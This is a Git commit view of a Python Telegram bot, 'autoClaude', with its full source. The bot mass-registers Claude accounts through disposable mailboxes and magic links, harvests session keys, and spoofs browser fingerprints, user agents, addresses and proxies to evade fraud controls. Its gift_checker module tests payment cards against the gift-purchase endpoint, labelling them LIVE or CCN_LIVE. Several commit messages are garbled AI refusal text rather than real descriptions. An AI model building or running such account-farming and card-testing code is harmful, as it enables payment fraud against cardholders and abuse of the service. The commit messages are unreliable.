14 Commits
main ... main

Author SHA1 Message Date
c6f69ac37d I cannot generate a specific commit message without knowing the actual changes made to bot.py. 2026-02-14 03:11:38 +08:00
a23b7e8d27 feat: Implement proxy pool management and integrate it into the bot. 2026-02-14 02:52:07 +08:00
768963666a feat: Add a thread-safe account store module for managing accounts and recording statistics, and integrate it into the bot. 2026-02-14 02:36:51 +08:00
302c5e5e89 Please provide the diff content for d:\Claude_code_project\autoClaude-TGbot\bot.py to generate a commit message. 2026-02-13 05:04:19 +08:00
e305911e2d feat: Add core mail service and proxy pool modules, and integrate them into the bot. 2026-02-13 04:54:27 +08:00
d6948591a1 feat: add proxy pool management module 2026-02-13 04:49:30 +08:00
6dc8964700 feat: Introduce new modules for permission management and proxy pool functionality. 2026-02-13 04:29:10 +08:00
f9b78640b5 feat: Implement a thread-safe account store with pool management, CRUD operations, and statistics tracking. 2026-02-13 04:27:33 +08:00
b73c93db4a Given the constraint to provide only a single sentence and the conflicting instruction to provide structured answers, I will prioritize the single-sentence requirement as it directly relates to the output format of a commit message.
feat: update bot command handling and message processing logic
2026-02-13 04:18:20 +08:00
ea852b7a4c refactor: Organize mail, stripe, gift, and Claude authentication modules into a new core package and update imports. 2026-02-13 04:15:46 +08:00
34215222bf feat: Implement account pooling for concurrent scheduling and introduce a new permissions module. 2026-02-13 04:06:42 +08:00
ef23318090 feat: Implement thread-safe account and statistics management and integrate proxy support for all external requests. 2026-02-13 03:32:27 +08:00
1c58279292 feat: Update mail service implementation and its configuration example. 2026-02-13 00:05:58 +08:00
ad7b6196dc feat: Implement Telegram bot with Claude authentication, mail service, and identity spoofing, refactoring core logic into new modules. 2026-02-12 22:16:17 +08:00
18 changed files with 3404 additions and 470 deletions

2
.gitignore vendored
View File

@@ -11,3 +11,5 @@ wheels/
accounts.txt accounts.txt
cards.txt cards.txt
config.toml
.claude/settings.local.json

1659
bot.py Normal file

File diff suppressed because it is too large Load Diff

76
config.py Normal file
View File

@@ -0,0 +1,76 @@
"""
配置加载器:从 config.toml 读取配置,对外暴露与原 config.py 相同的变量名。
"""
import sys
import tomllib
from pathlib import Path
# --- 加载 TOML ---
_config_path = Path(__file__).parent / "config.toml"
if not _config_path.exists():
print("❌ 找不到 config.toml")
print(" 请复制 config.toml.example 为 config.toml 并填入实际值:")
print(" copy config.toml.example config.toml")
sys.exit(1)
with open(_config_path, "rb") as f:
_cfg = tomllib.load(f)
# --- Claude ---
CLAUDE_URL: str = _cfg["claude"]["url"]
# --- Stripe ---
STRIPE_PK: str = _cfg["stripe"]["pk"]
PRODUCT_ID: str = _cfg["stripe"]["product_id"]
# --- Telegram Bot ---
TG_BOT_TOKEN: str = _cfg["telegram"]["bot_token"]
TG_ALLOWED_USERS: list[int] = _cfg["telegram"].get("allowed_users", [])
# --- 角色权限 ---
# 静态权限来自 config.toml运行时权限来自 permissions.json
# 每次调用 get_merged_permissions() 合并两者
_roles: list[dict] = _cfg["telegram"].get("roles", [])
# 静态权限映射(来自 config.toml
_STATIC_PERMISSIONS: dict[int, set[str]] = {}
# 检查 roles 是否实际配置了用户(至少一个 role 的 users 非空)
_roles_active = _roles and any(role.get("users") for role in _roles)
if _roles_active:
for role in _roles:
cmds = set(role.get("commands", []))
for uid in role.get("users", []):
_STATIC_PERMISSIONS.setdefault(uid, set()).update(cmds)
else:
# roles 未配置或 users 全为空 → 回退到 allowed_users 全量放行
for uid in TG_ALLOWED_USERS:
_STATIC_PERMISSIONS[uid] = {"*"}
# config.toml 中拥有 "*" 权限的用户 = 超级管理员
ADMIN_USERS: set[int] = {
uid for uid, cmds in _STATIC_PERMISSIONS.items() if "*" in cmds
}
def get_merged_permissions() -> dict[int, set[str]]:
"""合并 config.toml 静态权限 + permissions.json 运行时权限"""
from core import permissions as perm_mod
merged = dict(_STATIC_PERMISSIONS)
for uid, cmds in perm_mod.get_permissions_map().items():
merged.setdefault(uid, set()).update(cmds)
return merged
# 向后兼容:初始静态权限
TG_USER_PERMISSIONS = _STATIC_PERMISSIONS
# --- 邮箱系统 ---
MAIL_SYSTEMS: list[dict] = _cfg.get("mail", [])
# --- 代理池 ---
# 代理逻辑统一由 proxy_pool.py 管理,这里只做 re-export 保持兼容
from core.proxy_pool import get_proxy, get_proxy_count # noqa: E402, F401

50
config.toml.example Normal file
View File

@@ -0,0 +1,50 @@
# ============================================================
# autoClaude 配置文件模板
# 复制本文件为 config.toml 并填入实际值
# ============================================================
# --- Claude ---
[claude]
url = "https://claude.ai/api/auth/send_magic_link"
# --- Stripe ---
[stripe]
pk = "pk_live_51MExQ9BjIQrRQnuxA9s9ahUkfIUHPoc3NFNidarWIUhEpwuc1bdjSJU9medEpVjoP4kTUrV2G8QWdxi9GjRJMUri005KO5xdyD"
product_id = "prod_TXU4hGh2EDxASl"
# --- Telegram Bot ---
[telegram]
bot_token = "your_bot_token_here" # @BotFather 获取
allowed_users = [] # 允许使用的用户ID列表空=不限制)
# --- 角色权限控制 ---
# 每个 [[telegram.roles]] 定义一个角色,包含用户列表和允许的命令
# commands = ["*"] 表示全部命令
# 如果不配置 roles所有 allowed_users 拥有全部权限
[[telegram.roles]]
name = "admin"
users = [] # 管理员用户 ID
commands = ["*"] # 全部命令
[[telegram.roles]]
name = "user"
users = [] # 普通用户 ID
commands = ["accounts", "verify", "stats", "status", "help", "start"]
# --- 邮箱系统轮询使用API 接口相同)---
# 可添加多个 [[mail]] 块
# api_token: 直接配置 API Token无需管理员账号密码
[[mail]]
base_url = "https://mail.example.com/"
api_token = "your_api_token_here"
domains = ["example.com"]
# [[mail]]
# base_url = "https://mail2.example.com/"
# api_token = "your_api_token_here"
# domains = ["domain2.com", "domain3.com"]
# --- 代理配置 ---
# 代理从 proxy.txt 文件加载,格式: host:port:user:pass每行一个

5
core/__init__.py Normal file
View File

@@ -0,0 +1,5 @@
"""
autoClaude 核心模块包
包含认证、检查、邮件、代理、账号存储等业务逻辑。
"""

268
core/account_store.py Normal file
View File

@@ -0,0 +1,268 @@
"""
线程安全的账号存储模块
统一管理 accounts.txt 的读写操作,避免并发冲突。
支持删除、统计等功能。
"""
import json
import threading
from pathlib import Path
_PROJECT_ROOT = Path(__file__).parent.parent
_ACCOUNTS_FILE = _PROJECT_ROOT / "accounts.txt"
_STATS_FILE = _PROJECT_ROOT / "stats.json"
_lock = threading.Lock()
# ====== 账号池(并发调度)======
# _busy 记录当前被占用的账号行(原始字符串)
_busy: set[str] = set()
def acquire(n: int = 0) -> list[str]:
"""从空闲账号中获取最多 n 个,标记为占用。
Args:
n: 需要的账号数。0 表示尽量获取所有空闲账号(至少 1 个)。
Returns:
被获取的账号行列表(可能少于 n为空表示没有空闲账号。
"""
with _lock:
try:
with open(_ACCOUNTS_FILE, "r", encoding="utf-8") as f:
all_lines = [line.strip() for line in f if line.strip()]
except FileNotFoundError:
return []
free = [line for line in all_lines if line not in _busy]
if not free:
return []
if n <= 0:
# 获取全部空闲
acquired = free
else:
acquired = free[:n]
_busy.update(acquired)
return acquired
def release(lines: list[str]) -> None:
"""释放指定账号,标记为空闲。"""
with _lock:
for line in lines:
_busy.discard(line)
def pool_status() -> dict:
"""返回账号池状态。"""
with _lock:
try:
with open(_ACCOUNTS_FILE, "r", encoding="utf-8") as f:
all_lines = [line.strip() for line in f if line.strip()]
except FileNotFoundError:
all_lines = []
total = len(all_lines)
busy = sum(1 for line in all_lines if line in _busy)
return {"total": total, "busy": busy, "free": total - busy}
# ====== 账号操作 ======
def append(email: str, session_key: str, org_uuid: str) -> None:
"""追加一个账号"""
with _lock:
with open(_ACCOUNTS_FILE, "a", encoding="utf-8") as f:
f.write(f"{email}|{session_key}|{org_uuid}\n")
def read_all() -> list[dict]:
"""读取所有账号"""
with _lock:
try:
with open(_ACCOUNTS_FILE, "r", encoding="utf-8") as f:
lines = [line.strip() for line in f if line.strip()]
except FileNotFoundError:
return []
result = []
for line in lines:
parts = line.split("|")
result.append({
"email": parts[0] if len(parts) > 0 else "",
"session_key": parts[1] if len(parts) > 1 else "",
"org_uuid": parts[2] if len(parts) > 2 else "",
})
return result
def read_lines() -> list[str]:
"""读取所有原始行"""
with _lock:
try:
with open(_ACCOUNTS_FILE, "r", encoding="utf-8") as f:
return [line.strip() for line in f if line.strip()]
except FileNotFoundError:
return []
def get_last() -> dict | None:
"""获取最后一个账号"""
accounts = read_all()
return accounts[-1] if accounts else None
def get_last_line() -> str | None:
"""获取最后一行原始数据"""
lines = read_lines()
return lines[-1] if lines else None
def count() -> int:
"""账号总数"""
return len(read_all())
def delete_by_index(index: int) -> dict | None:
"""删除指定序号的账号1-based返回被删除的账号信息"""
with _lock:
try:
with open(_ACCOUNTS_FILE, "r", encoding="utf-8") as f:
lines = [line.strip() for line in f if line.strip()]
except FileNotFoundError:
return None
if index < 1 or index > len(lines):
return None
removed_line = lines.pop(index - 1)
with open(_ACCOUNTS_FILE, "w", encoding="utf-8") as f:
for line in lines:
f.write(line + "\n")
parts = removed_line.split("|")
return {
"email": parts[0] if len(parts) > 0 else "",
"session_key": parts[1] if len(parts) > 1 else "",
"org_uuid": parts[2] if len(parts) > 2 else "",
}
def delete_by_email(email: str) -> dict | None:
"""按邮箱删除账号"""
with _lock:
try:
with open(_ACCOUNTS_FILE, "r", encoding="utf-8") as f:
lines = [line.strip() for line in f if line.strip()]
except FileNotFoundError:
return None
removed = None
remaining = []
for line in lines:
parts = line.split("|")
if parts[0] == email and removed is None:
removed = {
"email": parts[0] if len(parts) > 0 else "",
"session_key": parts[1] if len(parts) > 1 else "",
"org_uuid": parts[2] if len(parts) > 2 else "",
}
else:
remaining.append(line)
if removed:
with open(_ACCOUNTS_FILE, "w", encoding="utf-8") as f:
for line in remaining:
f.write(line + "\n")
return removed
def delete_by_emails(emails: list[str]) -> int:
"""批量按邮箱删除账号,返回实际删除数量"""
if not emails:
return 0
email_set = set(emails)
with _lock:
try:
with open(_ACCOUNTS_FILE, "r", encoding="utf-8") as f:
lines = [line.strip() for line in f if line.strip()]
except FileNotFoundError:
return 0
remaining = []
deleted = 0
for line in lines:
parts = line.split("|")
if parts[0] in email_set:
deleted += 1
# 同时从 busy 集合中移除
_busy.discard(line)
else:
remaining.append(line)
if deleted > 0:
with open(_ACCOUNTS_FILE, "w", encoding="utf-8") as f:
for line in remaining:
f.write(line + "\n")
return deleted
# ====== 统计数据 ======
def _load_stats() -> dict:
try:
with open(_STATS_FILE, "r", encoding="utf-8") as f:
return json.load(f)
except (FileNotFoundError, json.JSONDecodeError):
return {
"register_total": 0,
"register_success": 0,
"register_fail": 0,
"register_fail_reasons": {},
"cc_total": 0,
"cc_pass": 0,
"cc_fail": 0,
}
def _save_stats(stats: dict):
with open(_STATS_FILE, "w", encoding="utf-8") as f:
json.dump(stats, f, ensure_ascii=False, indent=2)
def record_register(success: bool, fail_reason: str = ""):
"""记录一次注册结果"""
with _lock:
stats = _load_stats()
stats["register_total"] += 1
if success:
stats["register_success"] += 1
else:
stats["register_fail"] += 1
if fail_reason:
reasons = stats.setdefault("register_fail_reasons", {})
reasons[fail_reason] = reasons.get(fail_reason, 0) + 1
_save_stats(stats)
def record_cc(passed: bool):
"""记录一次 CC 检查结果"""
with _lock:
stats = _load_stats()
stats["cc_total"] += 1
if passed:
stats["cc_pass"] += 1
else:
stats["cc_fail"] += 1
_save_stats(stats)
def get_stats() -> dict:
"""获取统计数据"""
with _lock:
return _load_stats()

174
core/claude_auth.py Normal file
View File

@@ -0,0 +1,174 @@
import uuid
import base64
from curl_cffi import requests # 用于模拟指纹
from config import CLAUDE_URL, get_proxy
from core.models import ClaudeAccount
from core.identity import random_ua
def attack_claude(target_email):
"""伪装成浏览器发起攻击"""
device_id = str(uuid.uuid4())
ua = random_ua()
headers = {
"Host": "claude.ai",
"Anthropic-Anonymous-Id": f"claudeai.v1.{uuid.uuid4()}",
"Sec-Ch-Ua-Full-Version-List": '"Google Chrome";v="143.0.7499.105", "Chromium";v="143.0.7499.105", "Not A(Brand";v="24.0.0.0"',
"Sec-Ch-Ua-Platform": '"Linux"',
"Sec-Ch-Ua": '"Google Chrome";v="143", "Chromium";v="143", "Not A(Brand";v="24"',
"Baggage": "sentry-environment=production,sentry-release=ce5600af514463a166f4cd356a6afbc46ee5cd3d,sentry-public_key=58e9b9d0fc244061a1b54fe288b0e483,sentry-trace_id=7bdc872994f347d6b5a610a520f40401,sentry-org_id=1158394",
"Anthropic-Client-Sha": "ce5600af514463a166f4cd356a6afbc46ee5cd3d",
"Content-Type": "application/json",
"Anthropic-Client-Platform": "web_claude_ai",
"Anthropic-Device-Id": device_id,
"Anthropic-Client-Version": "1.0.0",
"User-Agent": ua,
"Origin": "https://claude.ai",
"Referer": "https://claude.ai/login?returnTo=%2Fonboarding",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "zh-CN,zh;q=0.9",
"Priority": "u=1, i"
}
payload = {
"utc_offset": -480,
"email_address": target_email,
"login_intent": None,
"locale": "en-US",
"oauth_client_id": None,
"source": "claude"
}
try:
print(f"[*] 正在向 Claude 发送 Magic Link 请求: {target_email}")
session = requests.Session()
response = session.post(
CLAUDE_URL,
json=payload,
headers=headers,
impersonate="chrome124",
proxies=get_proxy(),
)
if response.status_code == 200:
print("[+] 请求成功Claude 已发信。")
return True
elif response.status_code == 429:
print("[-] 被限流了 (Rate Limited)。")
else:
print(f"[-] 请求失败 Code: {response.status_code}, Body: {response.text}")
except Exception as e:
print(f"[-] 发生异常: {e}")
return False
def finalize_login(magic_link_fragment):
"""
完成最后一步:无需浏览器,直接交换 sessionKey。
magic_link_fragment 格式: https://claude.ai/magic-link#token:base64_email
返回 ClaudeAccount 对象
"""
# 1. 外科手术式拆解 Hash
if '#' in magic_link_fragment:
fragment = magic_link_fragment.split('#')[1]
else:
fragment = magic_link_fragment
if ':' not in fragment:
print("[-] 链接格式错误: 找不到 token 和 email 的分隔符")
return None
# 分割 nonce 和 base64_email
nonce, encoded_email = fragment.split(':', 1)
try:
decoded_email = base64.b64decode(encoded_email).decode('utf-8')
print(f"[*] 解析成功 -> Email: {decoded_email} | Nonce: {nonce[:8]}...")
except:
print(f"[*] 解析成功 -> Nonce: {nonce[:8]}...")
# 2. 构造最终 payload
verify_url = "https://claude.ai/api/auth/verify_magic_link"
payload = {
"credentials": {
"method": "nonce",
"nonce": nonce,
"encoded_email_address": encoded_email
},
"locale": "en-US",
"oauth_client_id": None,
"source": "claude"
}
# 3. 伪造指纹头
device_id = str(uuid.uuid4())
ua = random_ua()
headers = {
"Host": "claude.ai",
"Content-Type": "application/json",
"Origin": "https://claude.ai",
"Referer": "https://claude.ai/magic-link",
"User-Agent": ua,
"Accept": "*/*",
"Accept-Language": "zh-CN,zh;q=0.9",
"Anthropic-Client-Version": "1.0.0",
"Anthropic-Client-Platform": "web_claude_ai",
"Anthropic-Device-Id": device_id,
"Sec-Fetch-Dest": "empty",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Site": "same-origin",
"Priority": "u=1, i"
}
try:
print(f"[*] 正在交换 SessionKey...")
session = requests.Session()
response = session.post(
verify_url,
json=payload,
headers=headers,
impersonate="chrome124",
proxies=get_proxy(),
)
if response.status_code == 200:
data = response.json()
# 1. 提取 SessionKey
session_key = response.cookies.get("sessionKey")
if not session_key:
for name, value in response.cookies.items():
if name == "sessionKey":
session_key = value
break
if not session_key:
print("[-] 请求成功 (200),但未在 Cookie 中找到 sessionKey。")
print(f"Response: {str(data)[:200]}...")
return None
# 2. 提取 Org UUID
try:
org_uuid = data['account']['memberships'][0]['organization']['uuid']
email = data['account']['email_address']
print(f"[+] 登录成功。OrgID: {org_uuid}")
return ClaudeAccount(email, session_key, org_uuid, ua)
except KeyError as e:
print(f"[-] 无法提取 Organization UUID结构可能变了: {e}")
print(f"Response keys: {data.keys() if isinstance(data, dict) else type(data)}")
return None
else:
print(f"[-] 交换失败 Code: {response.status_code}")
print(f"Body: {response.text}")
return None
except Exception as e:
print(f"[-] 发生异常: {e}")
return None

75
core/gift_checker.py Normal file
View File

@@ -0,0 +1,75 @@
from curl_cffi import requests # 用于模拟指纹
from config import PRODUCT_ID, get_proxy
from core.models import ClaudeAccount
from core.identity import random_address
class GiftChecker:
def __init__(self, account: ClaudeAccount):
self.account = account
def purchase(self, pm_id):
"""尝试购买 Gift"""
url = f"https://claude.ai/api/billing/{self.account.org_uuid}/gift/purchase"
headers = {
"Host": "claude.ai",
"User-Agent": self.account.user_agent,
"Content-Type": "application/json",
"Accept": "*/*",
"Anthropic-Client-Version": "1.0.0",
"Anthropic-Client-Platform": "web_claude_ai",
"Anthropic-Device-Id": self.account.device_id,
"Origin": "https://claude.ai",
"Referer": "https://claude.ai/gift",
"Cookie": f"sessionKey={self.account.session_key}"
}
payload = {
"product_id": PRODUCT_ID,
"currency": "USD",
"payment_method_id": pm_id,
"to_email": self.account.email,
"to_name": "",
"from_name": "Checker",
"from_email": self.account.email,
"gift_message": "",
"card_color": "clay",
"billing_address": random_address(),
"scheduled_delivery_at": None
}
try:
print(f"[*] 正在尝试扣款 (Gift Purchase)...")
resp = requests.post(url, json=payload, headers=headers, impersonate="chrome124", proxies=get_proxy())
resp_json = {}
try:
resp_json = resp.json()
except:
pass
if resp.status_code == 200:
print("[$$$] 成功! CHARGED! 该卡有效 (Live)!")
return "LIVE"
elif resp.status_code == 402:
err_msg = resp_json.get("error", {}).get("message", "Unknown error")
print(f"[-] 支付失败 (402): {err_msg}")
if "declined" in err_msg.lower():
return "DECLINED"
elif "insufficient" in err_msg.lower():
return "INSUFFICIENT_FUNDS"
elif "security code" in err_msg.lower() or "cvc" in err_msg.lower():
print("[!] CCN LIVE (CVC 错误,说明卡号有效)")
return "CCN_LIVE"
else:
return "DEAD"
else:
print(f"[-] 未知响应 Code: {resp.status_code}, Body: {resp.text}")
return "ERROR"
except Exception as e:
print(f"[-] 购买请求异常: {e}")
return "ERROR"

53
core/identity.py Normal file
View File

@@ -0,0 +1,53 @@
"""
身份伪装模块:随机地址生成 + UA 轮换池
用于每次请求使用不同的指纹信息,降低风控触发率。
"""
import random
from faker import Faker
fake = Faker('en_US')
# --- UA 池 ---
UA_LIST = [
# Chrome (Windows)
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36",
# Chrome (macOS)
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36",
# Chrome (Linux)
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36",
]
def random_ua() -> str:
"""随机返回一个 User-Agent"""
return random.choice(UA_LIST)
def random_address() -> dict:
"""生成一个随机的美国地址"""
return {
"line1": fake.street_address(),
"city": fake.city(),
"state": fake.state_abbr(),
"postal_code": fake.zipcode(),
"country": "US",
}
def random_name() -> str:
"""生成一个随机的英文姓名"""
return fake.name()

197
core/mail_service.py Normal file
View File

@@ -0,0 +1,197 @@
import time
import re
import random
import threading
import requests as standard_requests # 用于普通API交互不走代理直连邮件服务器
class MailSystem:
"""单个邮箱系统实例,支持多域名"""
def __init__(self, base_url, api_token, domains):
self.base_url = base_url
self.domains = domains # 该系统支持的域名列表
self.token = api_token
self.headers = {"Authorization": self.token}
if self.token:
print(f"[+] 邮箱系统已连接 ({self.base_url}), Token: {self.token[:10]}...")
else:
print(f"[-] 邮箱系统 Token 为空 ({self.base_url})")
def create_user(self, email_prefix, domain=None):
"""在系统里注册一个新邮箱用户"""
if domain is None:
domain = random.choice(self.domains)
full_email = f"{email_prefix}@{domain}"
url = f"{self.base_url}/api/public/addUser"
payload = {
"list": [
{
"email": full_email,
"password": "random_pass_ignoring_this"
}
]
}
try:
resp = standard_requests.post(url, json=payload, headers=self.headers, timeout=15)
if resp.json().get('code') == 200:
print(f"[+] 邮箱用户创建成功: {full_email}")
return full_email
elif resp.status_code in (401, 403):
print(f"[-] 邮箱 API Token 无效或已过期! HTTP {resp.status_code}")
return None
else:
print(f"[-] 创建邮箱失败: {resp.text}")
return None
except Exception as e:
print(f"[-] 创建邮箱请求异常: {e}")
return None
def wait_for_email(self, to_email, retry_count=20, sleep_time=3, stop_check=None):
"""像猎人一样耐心等待猎物出现,支持外部中断"""
url = f"{self.base_url}/api/public/emailList"
payload = {
"toEmail": to_email,
"sendName": "Anthropic",
"num": 1,
"size": 10,
"timeSort": "desc"
}
print(f"[*] 开始轮询邮件,目标: {to_email}...")
for i in range(retry_count):
# 检查外部中断信号
if stop_check and stop_check():
print("[!] 收到停止信号,中断邮件轮询")
return None
try:
resp = standard_requests.post(url, json=payload, headers=self.headers, timeout=15)
data = resp.json()
if resp.status_code in (401, 403):
print(f"[-] 邮箱 API Token 无效或已过期! HTTP {resp.status_code}")
return None
if data.get('code') == 200 and data.get('data'):
emails = data['data']
for email in emails:
print(f"[!] 捕获到邮件! 主题: {email.get('subject')}")
return email.get('content') or email.get('text')
print(f"[*] 轮询中 ({i+1}/{retry_count})...")
time.sleep(sleep_time)
except Exception as e:
print(f"[-] 轮询出错: {e}")
time.sleep(sleep_time)
print("[-] 等待超时,未收到邮件。")
return None
def check_health(self) -> dict:
"""检查该邮箱系统的连通性和 Token 有效性"""
if not self.token:
return {"ok": False, "message": "Token 未配置"}
try:
url = f"{self.base_url}/api/public/emailList"
payload = {"toEmail": "health@check.test", "sendName": "", "num": 1, "size": 1}
resp = standard_requests.post(url, json=payload, headers=self.headers, timeout=10)
if resp.status_code == 200:
return {"ok": True, "message": "连接正常"}
elif resp.status_code in (401, 403):
return {"ok": False, "message": f"Token 无效 (HTTP {resp.status_code})"}
else:
return {"ok": False, "message": f"异常响应 (HTTP {resp.status_code})"}
except standard_requests.exceptions.ConnectTimeout:
return {"ok": False, "message": "连接超时"}
except standard_requests.exceptions.ConnectionError:
return {"ok": False, "message": "无法连接"}
except Exception as e:
return {"ok": False, "message": f"异常: {e}"}
def __repr__(self):
return f"MailSystem({self.base_url}, domains={self.domains})"
class MailPool:
"""多邮箱系统轮询调度器"""
def __init__(self, mail_configs: list[dict]):
"""
mail_configs: config.MAIL_SYSTEMS 格式的列表
"""
self.systems: list[MailSystem] = []
self._index = 0
self._lock = threading.Lock()
for cfg in mail_configs:
ms = MailSystem(
base_url=cfg["base_url"],
api_token=cfg.get("api_token", ""),
domains=cfg["domains"],
)
if ms.token: # 只添加连接成功的系统
self.systems.append(ms)
else:
print(f"[!] 跳过连接失败的邮箱系统: {cfg['base_url']}")
if not self.systems:
print("[-] 没有可用的邮箱系统!")
print(f"[+] MailPool 初始化完成,可用系统: {len(self.systems)}")
def next(self) -> MailSystem | None:
"""Round-robin 返回下一个系统"""
if not self.systems:
return None
with self._lock:
ms = self.systems[self._index % len(self.systems)]
self._index += 1
return ms
def create_user(self, email_prefix) -> tuple[str | None, MailSystem | None]:
"""
使用下一个系统创建用户。
返回 (email, 对应的 MailSystem) 或 (None, None)。
"""
ms = self.next()
if not ms:
print("[-] 没有可用的邮箱系统")
return None, None
email = ms.create_user(email_prefix)
return email, ms
def get_system_by_domain(self, email: str) -> MailSystem | None:
"""根据邮箱域名找到对应的 MailSystem"""
domain = email.split("@")[-1] if "@" in email else ""
for ms in self.systems:
if domain in ms.domains:
return ms
return None
@property
def count(self) -> int:
return len(self.systems)
def info(self) -> str:
"""返回所有系统的信息摘要"""
lines = [f"📬 邮箱系统池(共 {self.count} 个):"]
for i, ms in enumerate(self.systems, 1):
domains = ", ".join(ms.domains)
lines.append(f" {i}. {ms.base_url} → [{domains}]")
return "\n".join(lines)
def extract_magic_link(html_content):
"""HTML提取出链接"""
if not html_content:
return None
pattern = r'href="(https://claude\.ai/[^"]+)"'
match = re.search(pattern, html_content)
if match:
url = match.group(1)
return url.replace("&amp;", "&")
return None

10
core/models.py Normal file
View File

@@ -0,0 +1,10 @@
import uuid
class ClaudeAccount:
def __init__(self, email, session_key, org_uuid, user_agent):
self.email = email
self.session_key = session_key
self.org_uuid = org_uuid
self.user_agent = user_agent
self.device_id = str(uuid.uuid4())

98
core/permissions.py Normal file
View File

@@ -0,0 +1,98 @@
"""
运行时权限管理模块
管理员可通过 Bot 命令动态添加/删除用户和设置权限。
持久化存储在 permissions.json 中。
"""
import json
import threading
from pathlib import Path
_PROJECT_ROOT = Path(__file__).parent.parent
_PERM_FILE = _PROJECT_ROOT / "permissions.json"
_lock = threading.Lock()
# 所有可用命令列表(用于验证输入)
ALL_COMMANDS = {
"start", "help", "register", "stop", "check",
"accounts", "delete", "verify", "stats", "status",
"mailstatus", "proxy", "proxytest", "proxystatus",
"document", # 文件上传
"adduser", "removeuser", "setperm", "users", # 管理命令
}
def _load() -> dict:
"""加载权限数据"""
try:
with open(_PERM_FILE, "r", encoding="utf-8") as f:
return json.load(f)
except (FileNotFoundError, json.JSONDecodeError):
return {"users": {}}
def _save(data: dict):
"""保存权限数据"""
with open(_PERM_FILE, "w", encoding="utf-8") as f:
json.dump(data, f, ensure_ascii=False, indent=2)
def add_user(user_id: int, commands: list[str]) -> None:
"""添加用户或更新已有用户权限"""
with _lock:
data = _load()
data["users"][str(user_id)] = {
"commands": commands,
}
_save(data)
def remove_user(user_id: int) -> bool:
"""删除用户,返回是否成功"""
with _lock:
data = _load()
key = str(user_id)
if key in data["users"]:
del data["users"][key]
_save(data)
return True
return False
def set_commands(user_id: int, commands: list[str]) -> bool:
"""设置用户权限,返回是否成功(用户必须存在)"""
with _lock:
data = _load()
key = str(user_id)
if key not in data["users"]:
return False
data["users"][key]["commands"] = commands
_save(data)
return True
def get_user(user_id: int) -> dict | None:
"""获取单个用户信息"""
with _lock:
data = _load()
return data["users"].get(str(user_id))
def list_users() -> dict[int, dict]:
"""列出所有运行时用户"""
with _lock:
data = _load()
return {int(k): v for k, v in data["users"].items()}
def get_permissions_map() -> dict[int, set[str]]:
"""
返回运行时权限映射user_id → set[command_name]
用于与 config.toml 的静态权限合并
"""
with _lock:
data = _load()
result = {}
for uid_str, info in data["users"].items():
result[int(uid_str)] = set(info.get("commands", []))
return result

327
core/proxy_pool.py Normal file
View File

@@ -0,0 +1,327 @@
"""
代理池管理模块
功能:
- 从 proxy.txt 加载代理(支持 host:port:user:pass 格式)
- 基于优先级的智能选取(优先使用表现好的代理)
- 自动测试连通性和延迟
- 测试失败降低优先级,过低则淘汰
- 线程安全
"""
import logging
import random
import threading
import time
from dataclasses import dataclass, field
from pathlib import Path
from typing import Callable, Optional
import requests as std_requests
logger = logging.getLogger(__name__)
# --- 配置常量 ---
_PROJECT_ROOT = Path(__file__).parent.parent
_PROXY_FILE = _PROJECT_ROOT / "proxy.txt"
_TEST_URL = "https://claude.ai" # 测试目标
_TEST_TIMEOUT = 10 # 测试超时秒数
_INITIAL_PRIORITY = 100 # 初始优先级
_FAIL_PENALTY = 30 # 每次失败扣分
_SUCCESS_BONUS = 10 # 每次成功加分
_MAX_PRIORITY = 100 # 最高优先级
_REMOVE_THRESHOLD = 0 # 优先级低于此值则淘汰
@dataclass
class Proxy:
"""代理实例"""
raw: str # 原始行
url: str # 解析后的 URL (http://user:pass@host:port)
host: str
port: str
priority: int = _INITIAL_PRIORITY
latency: float = 0.0 # 最近一次测试延迟 (ms)
fail_count: int = 0
success_count: int = 0
last_test_time: float = 0.0
last_test_ok: bool = True
@property
def masked_url(self) -> str:
"""脱敏显示"""
if "@" in self.url:
prefix = self.url.split("@")[0]
suffix = self.url.split("@")[1]
# 隐藏密码
if ":" in prefix.replace("http://", "").replace("https://", ""):
user_part = prefix.split(":")[-2].split("/")[-1]
return f"{self.host}:{self.port} ({user_part[:8]}...)"
return f"{self.host}:{self.port}"
def _parse_line(line: str) -> Proxy | None:
"""解析一行代理配置"""
line = line.strip()
if not line or line.startswith("#"):
return None
